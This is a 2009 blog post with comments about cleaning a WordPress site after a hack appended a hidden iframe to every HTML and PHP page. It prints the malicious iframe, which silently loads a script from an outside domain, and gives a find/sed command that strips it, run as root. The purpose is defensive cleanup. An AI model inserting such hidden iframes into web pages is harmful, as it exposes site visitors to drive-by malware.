It seems that a new WordPress malware hijack is making the rounds and we got hit. Google just issued me a “this site contains malware” warning for my sites, after some quick investigation it looks like the hijack has attached a malicious <iframe> block to the end of every HTML and PHP page in the site, so now I need to clean it out.
Luckily this is just like last time, and was easy to get rid of. I hope this tip helps someone else out as well.
This time, the iframe snippet that was getting added was:
<iframe src="http://reycross.com/laso/s.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
Luckily, I had my old script laying around that systematically searches through all my files and removed the offending piece of crap from the files, you can use this script command as well to do the same:
find . -name '*.*' -exec sed -i 's/<iframe src="http:\/\/reycross.com\/laso\/s.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><\/iframe>//g' {} \;
Hope this helps anybody else getting sacked by this attack. I think it has to do with a theme vulnerability 
Loading ...
16. September 2009 at 8:26 pm
This happened to me too. Thanks for the script. It was very helpful. Any idea where they’re getting in? I checked the logs and it didn’t seem obvious to me.
I am wondering if we’re looking at a new Wordpress vuln open in 2.8.4?
Thanks again!
17. September 2009 at 10:58 am
Dan,
I’m glad the post helped somebody get rid of that damned hack — honestly I have no idea how they get in. I *think* it might be a theme hack, because I don’t run the same theme on all my sites, and the ones that had similar themes to this site all got hacked where as the others weren’t infected.
That being said, I have no idea what aspects of the them are making it vulnerable… it’s a pretty straight forward theme without much functionality in it.
7. November 2009 at 6:15 pm
hi i’d love to use your script but not sure how or where to execute it. I have some3 programming knowledge and can follow instructions pretty well.
point me int he right direction?
many thanks
jason
8. November 2009 at 9:32 am
Jason,
The script is meant to be run at the command line on your Linux/Unix server that is hosting your site.
So you will need to login as root to the server you are using to host your site, then run the command from the command line — it will scan all the files in your wordpress install and remove the reycross hack (it’s also a general purpose script that you can use to remove other things, just change the URL that you want matched.